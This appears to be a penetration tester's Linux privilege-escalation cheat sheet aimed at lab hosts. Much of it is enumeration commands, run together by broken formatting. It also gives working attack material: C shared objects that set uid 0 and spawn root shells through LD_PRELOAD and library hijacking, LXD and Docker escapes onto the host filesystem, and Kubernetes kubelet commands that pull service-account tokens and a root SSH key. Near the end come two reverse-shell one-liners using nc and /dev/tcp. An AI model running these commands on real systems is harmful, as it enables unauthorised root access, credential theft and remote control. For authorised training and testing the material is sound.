Linux Privilege Escalation
Linux Privilege Escalation
Enumeration
General command
whoamiidhostnameip -aofifconfigsudo -l
OS Related
OS Version
cat /etc/os-release
Kernel Version
uname -runame -acat /proc/version
Users
LoggedIn User
wwholastlog
Home Directory Content
ls /homels -la /home/<username>/ls -l ~/.ssh
Environment
echo $PATHenv
Shell Installed
cat /etc/shells
Bash History
`history
Sudo Priviliges
sudo -l
Users
cat /etc/passwdcat /etc/groupgetent group <gruppo>
Interesting Files
Configuration Files
.conf.config.xml.bakfind / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/nullfind / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
Scripts File
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
Readable Shadow File
/etc/shadow
Files & Dir
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/nullfind / -type d -name ".*" -ls 2>/dev/nullls -l /tmp /var/tmp /dev/shm
Finding History Files
find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null
Find Writable
Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/nullFiles
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Services & Internal Enumeration
Cron Jobs
ls -la /etc/cron.daily/
File System and Additional Drives
lsblk-> drivelpstat-> printercat /etc/fstab-> drive/file systemdf -h-> mounted file systemcat /etc/fstab | grep -v "#" | column -t-> unmounted file system
Network
ip aroute-netstat -rarp -acat /etc/resolv.confcat /etc/hosts
Binaries
ls -l /bin /usr/bin/ /usr/sbin/
Hardware
lscpu
Running Services
find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"
List Current Process
ps aux | grep <user>/rootps au
Sudo Version
sudo -V
Installed Packages and Version
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
Misconfiguration
Path Abuse
Check
PATH env
Wildcard Abuse
Check if
*, ?, [], ~, -
SETUID adn SETGID permissions
SETUID adn SETGID permissionsfind "$DIRECTORY" -perm /4000find "$DIRECTORY" -perm /2000find "$DIRECTORY" -perm /u=s,g=sfind / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/nullfind / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
Sudo Right Abuse
sudo -l
Weak NFS
showmount -e 10.129.2.12cat /etc/exportsCopy shell to /mnt and add SETUID
cp shell /mntchmod u+s /mnt/shellsudo mount -t nfs 10.129.2.12:/tmp /mnt
Hijacking Tmux Session
Check
tmuxprocess running as a privileged user (devgroup onlu )ps aux | grep tmuxls -la /sharedstmux -S /shareds
Capabilities
CAP_SETUIDCAP_SETGIDCAP_SYS_ADMINEnumerate
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
Privileged Groups
LXC/LXDStaring privilege container with privileged=true
lxd initlxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine`lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=truelxc config device add privesc host-root disk source=/ path=/mnt/root recursive=truelxc start r00tlxc exec r00t /bin/sh
Dockersee Docker Abuse
DiskADM
Service and process Abuse
Cron Job Abuse
/etc/cron.dls -la /etc/cron.daily/Find writable file
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
Enumerate running process
./pspy64 -pf -i 1000
Docker Abuse
DockerSame as Linux
Intereseting
docker.sock-/var/run/docker.sock/tmp/docker -H unix:///app/docker.sock ps/tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app/tmp/docker -H unix:///app/docker.sock ps/tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bashdocker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
Kubernetes
Each pod functions as a separate virtual machine on a node, complete with its own IP, hostname, and other details.
Control Plane -> master node
TCP etcd
2379,2380API Server
6443Scheduler
10251Controller manager
10252Kubelet API
10250Read-Only Kubelet API
10255
Minion -> Worker Noded
API Server Interaction
curl https://10.129.10.11:6443 -kExtracting Pod
curl https://10.129.10.11:10250/pods -k | jq .
Extracting pod
kubeletctl -i --server 10.129.10.11 pods
Available Commands
kubeletctl -i --server 10.129.10.11 scan rce
Execute Command
$ kubeletctl -i --server 10.129.10.11 exec "id" -p nginx -c nginx
Extracting Token
kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token
Extracting Certificates
kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt
List Privileges
export token=cat k8.token`kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list
Creating new pod
kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yamlkubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods
Extracting root ssh key
kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
LogRotate
logrotatecat /etc/logrotate.confsudo cat /var/lib/logrotate.statusls /etc/logrotate.d/cat /etc/logrotate.d/dpkgFor exploiting
write permission on the log files
run as root
vulnerable version e.g., 3.8.6, 3.11.0, 3.15.0, 3.18.0
Tools - https://github.com/whotwagner/logrotten
Shared Library
General Information
Static libraries
.aCompiled and part of the program
dynamically linked shared object libraries
.soCan be altered
Specify location of dynamic libraries
when compiling
-rpathor-rpath-linkusing env
LD_RUN_PATHorLD_LIBRARY_PATHplacing in
/libor/usr/libChanging
/etc/ld.so.confLD_PRELOAD- load library before executing binary
ldd binary
Exploiting LD_PRELOAD
LD_PRELOADCompile a
so object
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o root.so root.c -nostartfilessudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
Shared Object Hijacking
Searching non standard library
use
ldd <binary>
Find
RUNPATHconfiguration (load shared libraries from custom location)readelf -d payroll | grep PATH
Before create a new library find function name called by binary
Running program and see undefined symbol
Create malicious shared object
#include<stdio.h> #include<stdlib.h> void dbquery() { printf("Malicious library loaded\n"); setuid(0); system("/bin/sh -p");
gcc src.c -fPIC -shared -o /development/libshared.so
Python Library Hijackin
Wrong write permission
Change content library where is used
#!/usr/bin/env python3 import psutil available_memory = psutil.virtual_memory()grep -r "def virtual_memory"
Library Path
python3 -c 'import sys; print("\n".join(sys.path))'module imported from target
write permission on specific module or on higher module
ls -al <path>
PYTHONPATHenvironment variablePYTHONPATHis an environment variable that indicates what directory (or directories) Python can search for modules to import.sudo PYTHONPATH=/newPATHWithLib /usr/bin/python3 ./mem_status.py
Various
Passive Traffic Capture
net-creds - https://github.com/DanMcInerney/net-creds
PCredz - https://github.com/lgandx/PCredz
0-day & Kernel Exploit
Sudo
Polkit
DirtyPipe - DirtyCow -
Netfilter
Rev Shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/fbash -i >& /dev/tcp/10.10.14.3/443 0>&1
Tools
LinEnum - LinEnum
strace - for get creds
readelfldd
Resources
Last updated